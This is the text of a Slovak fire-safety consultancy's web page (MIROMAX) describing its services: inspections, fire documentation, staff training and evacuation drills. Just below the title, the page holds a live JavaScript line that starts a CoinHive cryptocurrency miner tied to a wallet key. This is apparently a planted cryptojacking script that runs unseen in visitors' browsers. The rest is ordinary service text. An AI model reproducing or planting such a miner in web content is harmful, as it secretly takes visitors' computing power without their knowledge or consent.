POŽIARNA OCHRANA

var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start();

 

Spolupráca s našou spoločnosťou MIROMAX vám dokáže výrazne znížiť riziko požiaru. Doprajeme vám komfort, ktorý vám umožní bezpečné podnikanie. Zároveň našim klientom, teda vám, poskytneme profesionalitu.

 

Služby technika protipožiarnej ochrany

 

 

 

Zabránime príčinám vzniku prípadných požiarov.

 

MIROMAX zabezpečuje bezpečnosť prevádzky vašej spoločnosti. V pravidelných časových intervaloch vykonáme protipožiarne kontroly ako aj odborné zaškolenie zamestnancov vykonané našimi špecialistami a technikmi PO.

 

Náplňou práce technika protipožiarnej ochrany MIROMAX-u je:

 

a) vykoná preventívne protipožiarne prehliadky

b) určí miesta so zvýšeným nebezpečenstvom vzniku požiaru a počtu členov protipožiarnych hliadok

c) vykoná školenia o ochrane pred požiarmi a odbornej prípravy protipožiarnych hliadok

d) vypracuje, vedie a udržiava dokumentáciu OPP v súlade so skutočným stavom

e) určuje požiadavky na protipožiarnu bezpečnosť pri užívaní stavby a pri zmene v užívaní stavby

f) organizuje a vyhodnocuje cvičný požiarny poplach

g) poskytuje poradenskú službu

 

Nemáte prehľad o povinnostiach vyplývajúcich zo zákona pre vašu spoločnosť?

Alebo máte iný problém, ktorý neviete vyriešiť?

 

Naša poradenská služba je vám plne k dispozícii. Špecialisti a technici požiarnej ochrany v oblasti OPP profesionálne vyriešia, či už telefonicky, elektronicky (formou e-mailu) alebo osobne akékoľvek problémy, ktoré práve riešite.

 

Čaká vás kontrola štátneho požiarneho dozoru?

 

Žiadny strach, vďaka prítomnosti našich špecialistov a technikov počas kontroly poskytujeme odbornú istotu.

 

 

Služby

 

Vykonávame vstupnú prehliadku za účelom posúdenia stavu OPP. 

 

Vypracujeme protokol so skutočnosťami a nedostatkami zistenými pri vstupnej prehliadke za účelom posúdenia stavu OPP a navrhneme opatrenia na odstránenie zistených nedostatkov.

  

Dokumentácia

 

Vypracúvame dokumentáciu podľa potrieb klientov:

 

a) požiarny štatút - organizačné usporiadanie OPP, povinnosti vedúcich zamestnancov, zoznam objektov a miest so zvýšeným nebezpečenstvom vzniku požiaru, spôsob a lehoty vykonávania kontrol dodržiavania predpisov, zoznam objektov, kde sú jednoduché podmienky evakuácie osôb a zvierat, spôsob zabezpečenia OPP v mimopracovnom čase

 

b) požiarny poriadok pracoviska - stručný opis technologického postupu a charakteristika nebezpečenstva vzniku požiaru na pracovisku, požiarno-technické charakteristiky surovín, požiadavky na pracovisko na zabezpečenie OPP, zoznam miest a zariadení so zvýšeným nebezpečenstvom vzniku požiaru alebo výbuchu a opatrenia na zamedzenie vzniku a šírenia požiaru, osobitné povinnosti zamestnancov

 

c) požiarne poplachové smernice - povinnosti zamestnanca, ktorý spozoruje požiar, spôsob vyhlásenia požiarneho poplachu, povinnosti zamestnancov pri vyhlásení požiarneho poplachu, miesto a číslo telefónu ohlasovne požiarov a hasičskej jednotky

 

d) požiarny evakuačný plán - určenie zamestnancov, ktorí budú riadiť evakuáciu, určenie zamestnancov a prostriedkov na vykonávanie evakuácie,určenie spôsobu evakuácie, určenie miesta, kde sa evakuované osoby budú sústreďovať, spôsob zabezpečenia prvej zdravotnej pomoci postihnutým osobám, grafické vyznačenie evakuačných ciest                                                                               

e) zoznam objektov a prehľad miest so zvýšeným nebezpečenstvom vzniku požiaru

 

f) dokumentácia o školení zamestnancov a odbornej príprave protipožiarnych hliadok o OPP

 

Pokiaľ dôjde k zmenám právnych predpisov v oblasti OPP, ako aj v prípade organizačnej zmene alebo inej zmene u klienta bezodkladne aktualizujeme, skontrolujeme dokumentáciu v zmysle najnovších noviel.

 

Protipožiarne prehliadky

 

Vykonávame preventívne protipožiarne prehliadky:

 

a) každých 12 mesiacov v obytných domoch, objektoch a v priestoroch, kde sú len občasné pracovné miesta, v ktorých nie je zamestnanec pravidelne viazaný a kde sa zdržiava len občas v niekoľkodňových intervaloch, obvykle len na účely kontroly, údržby alebo opravy

b) každých 6 mesiacov v objektoch a v priestoroch, v ktorých sa vykonáva len administratívna činnosť

c) každé 3 mesiace v ostatných objektoch alebo priestoroch

 

Následne vedieme záznamy v požiarnej knihe o dôležitých skutočnostiach OPP.

 

Vyhlasovanie, riadenie a vyhodnotenie cvičného požiarneho poplachu v termíne jedenkrát za 12 mesiacov.

 

Cvičný požiarny poplach sa vykonáva pri objektoch, ktoré majú vypracovaný evakuačný plán. Požiarny evakuačný plán sa zo zákona vyhotovuje pre objekt, v ktorom nie sú jednoduché podmienky na evakuáciu osôb, či zvierat, teda objekt má viac než dve podlažia a súčasná evakuácia po únikových cestách nevedie priamo na voľné priestranstvo.

 

Odborná príprava zamestnancov

 

Vykonávame odborné školenia zamestnancov v oblasti OPP a overujeme vedomosti zamestnancov zabezpečujúcich OPP v mimopracovnom čase:

 

a) vstupné, pred nástupom do zamestnania

b) periodické, u všetkých zamestnancov raz za 24 mesiacov

c) zamestnancov zabezpečujúcich OPP v mimopracovnom čase, jeden krát za 12 mesiacov

 

Odborná príprava členov protipožiarnych hliadok:

 

Členovia protipožiarnej hliadky dozerajú na dodržiavanie opatrení na zamedzenie vzniku a šíreniu požiaru v objekte. Pri vzniku požiaru taktiež vykonávajú evakuáciu osôb a zdolávajú požiar, čím dochádza k zníženiu škôd pri vzniku prípadného požiaru.

 

a) členovia protipožiarnej hliadky pracoviska, pred zaradením do protipožiarnej hliadky a opakovane jedenkrát za 12 mesiacov

b) členovia protipožiarnej asistenčnej hliadky, pred zaradením do protipožiarnej hliadky a opakovane jedenkrát za 12 mesiacov, pokiaľ sa jedná o opakovanú činnosť

 

MIROMAX, s.r.o. © 1994 - 2015.  Bezpečnosť práce, protipožiarna ochrana, civilná ochrana, environment, pracovná zdravotná služba vo firmách.

Kurzy, školenia, revízie a predaj protipožiarneho tovaru.

 

KONTAKTY * MAPA * O NÁS